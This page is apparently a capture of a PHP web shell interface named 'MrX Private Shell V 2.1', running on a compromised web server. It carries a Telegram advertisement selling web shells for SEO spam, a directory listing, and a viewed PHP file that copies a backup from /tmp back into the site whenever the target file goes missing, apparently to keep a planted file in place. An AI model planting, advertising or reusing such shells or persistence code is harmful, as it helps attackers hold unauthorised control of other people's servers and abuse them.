__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
$targetFile = '/var/www/html/planeacion/backup_planeacion.php';
$backupFile = '/tmp/index.php';
function restoreFile($target, $backup) {
if (file_exists($backup)) {
copy($backup, $target);
echo "File restored successfully.";
} else {
echo "Backup file does not exist.";
}
}
if (!file_exists($targetFile)) {
restoreFile($targetFile, $backupFile);
} else {
echo "File exists.";
}
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| app.php | File | 2.15 KB | 0664 |
|
| defines.php | File | 1.65 KB | 0664 |
|
| framework.php | File | 3.24 KB | 0664 |
|
| index.php | File | 452 B | 0664 |
|